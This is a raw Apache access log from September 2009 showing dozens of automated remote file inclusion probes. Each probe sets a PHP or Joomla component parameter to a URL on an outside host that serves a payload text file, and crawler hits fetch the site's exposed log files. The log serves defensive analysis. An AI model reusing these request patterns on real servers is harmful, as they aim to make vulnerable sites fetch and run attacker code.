82.179.196.195 - - [16/Sep/2009:09:54:27 -0700] "GET /logs/access_080321.log/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:27 -0700] "GET /logs/access_090216.log%20%20/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:29 -0700] "GET /logs/access_090216.log/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:54:29 -0700] "GET /bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:54:29 -0700] "GET /logs/access_090903.log%20%20//bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:54:29 -0700] "GET /logs//bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:32 -0700] "GET /components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:32 -0700] "GET /logs/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:32 -0700] "GET /logs/access_080321.log/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:54:33 -0700] "GET /logs/access_090216.log/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:55:13 -0700] "GET /ggambo7002_gallery/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:55:13 -0700] "GET /logs//ggambo7002_gallery/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:55:13 -0700] "GET /logs/access_090805.log//ggambo7002_gallery/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:55:13 -0700] "GET /logs/access_090729.log//ggambo7002_gallery/setup.php?dir=http://www.diakonia-jkt.sch.id/upload/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:09:55:26 -0700] "GET /logs//modules/Forums/admin/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:09:55:26 -0700] "GET /logs/access_080619.log//modules/Forums/admin/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:09:55:26 -0700] "GET /modules/Forums/admin/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:55:43 -0700] "GET /logs/access_090205.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:55:43 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:55:43 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
203.234.62.129 - - [16/Sep/2009:09:55:44 -0700] "GET /logs/access_080518.log//modules/Forums/admin/errors.php?error=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:56:14 -0700] "GET /bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:56:14 -0700] "GET /logs//bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:09:56:14 -0700] "GET /logs/access_090804.log%20%20//bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:56:16 -0700] "GET /logs/access_090611.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:56:23 -0700] "GET /logs/access_080423.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:56:25 -0700] "GET /logs/access_080819.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:56:28 -0700] "GET /logs/access_080617.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:56:31 -0700] "GET /logs/access_081107.log//main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:56:31 -0700] "GET /logs//main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:56:31 -0700] "GET /main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:56:36 -0700] "GET /logs/access_090322.log//main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:56:37 -0700] "GET /ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:56:37 -0700] "GET /logs/access_090729.log//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:56:45 -0700] "GET /logs//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:56:48 -0700] "GET /logs/access_090624.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.47.188 - - [16/Sep/2009:09:56:50 -0700] "GET /logs/access_090805.log//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:56:51 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:56:51 -0700] "GET /logs/access_090205.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:56:51 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:57:11 -0700] "GET /logs/access_081107.log%20%20//main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
66.11.230.202 - - [16/Sep/2009:09:57:11 -0700] "GET /logs/access_090322.log%20%20//main.php?appserv_root=http://www.wett-profis.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:57:19 -0700] "GET /logs/access_071011.log HTTP/1.0" 200 23938 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:57:21 -0700] "GET /logs/scriptsold.log//tools/send_reminders.php?noSet=0&includedir=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:57:21 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.95.106 - - [16/Sep/2009:09:57:22 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://hostned.ws//sites/hardcore/v8id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:09:57:22 -0700] "GET /logs/access_070724.log HTTP/1.0" 200 173704 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:09:57:36 -0700] "GET /logs/access_080617.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:38 -0700] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:38 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:38 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:44 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:49 -0700] "GET /components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:49 -0700] "GET /logs//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:49 -0700] "GET /logs/access_080416.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:57:57 -0700] "GET /logs/access_080218.log//components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.101.12 - - [16/Sep/2009:09:58:16 -0700] "GET /logs/access_080226.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.autoteile-tuning.net//images/.../sodok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.101.12 - - [16/Sep/2009:09:58:16 -0700] "GET /skins/advanced/advanced1.php?pluginpath[0]=http://www.autoteile-tuning.net//images/.../sodok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.101.12 - - [16/Sep/2009:09:58:16 -0700] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.autoteile-tuning.net//images/.../sodok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:58:43 -0700] "GET /ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:58:44 -0700] "GET /logs/access_090729.log//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:58:44 -0700] "GET /logs//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:58:50 -0700] "GET /logs/access_090805.log//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:59:07 -0700] "GET /logs/access_090223.log%20%20/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:09:59:12 -0700] "GET /logs/access_090223.log%20%20/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:59:19 -0700] "GET /logs/access_090805.log//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:59:19 -0700] "GET /logs//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:59:19 -0700] "GET /ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.48.121.149 - - [16/Sep/2009:09:59:19 -0700] "GET /logs/access_090729.log//ggambo7002_gallery/setup.php?dir=http://dogstudio.net/ampoll/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.101.12 - - [16/Sep/2009:09:59:41 -0700] "GET /logs/access_080528.log//skins/advanced/advanced1.php?pluginpath[0]=http://www.autoteile-tuning.net//images/.../sodok.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.252.26.98 - - [16/Sep/2009:09:59:52 -0700] "GET /logs/access_080623.log/services.php?page=http://www.mywebbguy.com/includes/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:03 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:03 -0700] "GET /skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:03 -0700] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:08 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.rankkuwait.com/rankmail/copyright.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
77.221.130.2 - - [16/Sep/2009:10:00:09 -0700] "GET /logs/access_090704.log//skin/zero_vote/error.php?dir=http://www.tabakoff.ru//dimti/AinuLid1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:32 -0700] "GET /logs/access_080524.log//main.php?sayfa=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:32 -0700] "GET /main.php?sayfa=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:32 -0700] "GET /logs//main.php?sayfa=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.251.142.142 - - [16/Sep/2009:10:00:34 -0700] "GET /logs/access_090721.log%20%20//bbs//skin/ggambo7002_boardgallery/setup.php?dir=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:00:36 -0700] "GET /logs/access_080313.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.6.18.216 - - [16/Sep/2009:10:00:36 -0700] "GET /logs/access_080826.log HTTP/1.0" 200 3434121 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:43 -0700] "GET /logs/access_080615.log//main.php?sayfa=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:49 -0700] "GET /main.php?pagina=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:49 -0700] "GET /logs/access_080524.log%20%20/main.php?pagina=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:00:49 -0700] "GET /logs/main.php?pagina=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:01:02 -0700] "GET /logs/access_080702.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.174.17.53 - - [16/Sep/2009:10:01:02 -0700] "GET /logs/access_090322.log%20%20/main.php?pagina=http://www.sh1908.org//bbs//skin/ggambo7002_board/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:01:04 -0700] "GET /logs/access_071106.log HTTP/1.0" 200 29238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:01:11 -0700] "GET /logs/access_081126.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:01:11 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:01:11 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:01:13 -0700] "GET /logs/access_090811.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:01:51 -0700] "GET /logs/access_090123.log%20%20/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:02:12 -0700] "GET /logs/access_081126.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.179.196.195 - - [16/Sep/2009:10:02:13 -0700] "GET /logs/access_090123.log%20%20/playlist.php?dir=http://www.mmbeauty.idv.tw//catalog/zxx.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:02:13 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 117499 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:02:13 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:02:15 -0700] "GET /logs/access_090811.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.10.213.166 - - [16/Sep/2009:10:02:23 -0700] "GET /logs/access_080313.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://quantum.chonbuk.ac.kr/board/bbs//skin/rosun2005GL_GALLERY/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:02:26 -0700] "GET /logs/access_080321.log%20//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:02:26 -0700] "GET /logs//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:02:26 -0700] "GET /components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.190.166.35 - - [16/Sep/2009:10:02:26 -0700] "GET /logs/access_080330.log%20//components/com_galleria/galleriaa.html.php?mosConfig_absolute_path=http://tvse.nl/images/id.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:02:35 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:02:35 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:02:35 -0700] "GET /logs/access_081123.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [16/Sep/2009:10:02:35 -0700] "GET /logs/access_080710.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://karaoke.kerma-nn.ru/katalogm//.cache/one.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:02:38 -0700] "GET /logs/access_081128.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [16/Sep/2009:10:03:05 -0700] "GET /logs/access_081213.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:03:09 -0700] "GET /logs/access_080819.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:03:11 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:03:13 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 200 19919 "-" "Mozilla/5.0" "www.dmulk.com"
67.205.103.171 - - [16/Sep/2009:10:03:13 -0700] "GET /logs/access_080507.log/////?_SERVER[DOCUMENT_ROOT]=http://www.jahanradio.com/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
